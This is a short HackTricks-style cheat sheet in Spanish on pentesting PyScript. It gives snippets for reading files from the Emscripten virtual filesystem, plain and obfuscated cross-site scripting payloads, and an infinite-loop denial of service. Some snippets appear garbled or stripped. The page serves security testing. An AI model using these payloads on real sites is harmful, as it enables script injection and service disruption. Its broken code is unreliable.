# Pyscript
{{#include ../../banners/hacktricks-training.md}}
## Guía de Pentesting de PyScript
PyScript es un nuevo marco desarrollado para integrar Python en HTML, por lo que se puede usar junto con HTML. En esta hoja de trucos, encontrarás cómo usar PyScript para tus propósitos de pruebas de penetración.
### Volcando / Recuperando archivos del sistema de archivos de memoria virtual de Emscripten:
`CVE ID: CVE-2022-30286`\
\
Código:
```html
with open('/lib/python3.10/site-packages/_pyodide/_base.py', 'r') as fin: out
= fin.read() print(out)
```
### [Exfiltración de datos OOB del sistema de archivos de memoria virtual Emscripten (monitoreo de consola)](https://github.com/s/jcd3T19P0M8QRnU1KRDk/~/changes/Wn2j4r8jnHsV8mBiqPk5/blogs/the-art-of-vulnerability-chaining-pyscript)
`CVE ID: CVE-2022-30286`\
\
Código:
```html
x = "CyberGuy" if x == "CyberGuy": with
open('/lib/python3.10/asyncio/tasks.py') as output: contents = output.read()
print(contents) print('
')
```
### Cross Site Scripting (Ordinario)
Código:
```python
print("
")
```
### Cross Site Scripting (Python Ofuscado)
Código:
```python
sur = "\u0027al";fur = "e";rt = "rt"
p = "\x22x$$\x22\x29\u0027\x3E"
s = "\x28";pic = "\x3Cim";pa = "g";so = "sr"
e = "c\u003d";q = "x"
y = "o";m = "ner";z = "ror\u003d"
print(pic+pa+" "+so+e+q+" "+y+m+z+sur+fur+rt+s+p)
```
### Cross Site Scripting (Ofuscación de JavaScript)
Código:
```html
prinht("
")
```
### Ataque DoS (Bucle infinito)
Código:
```html
while True:
print(" ")
```
{{#include ../../banners/hacktricks-training.md}}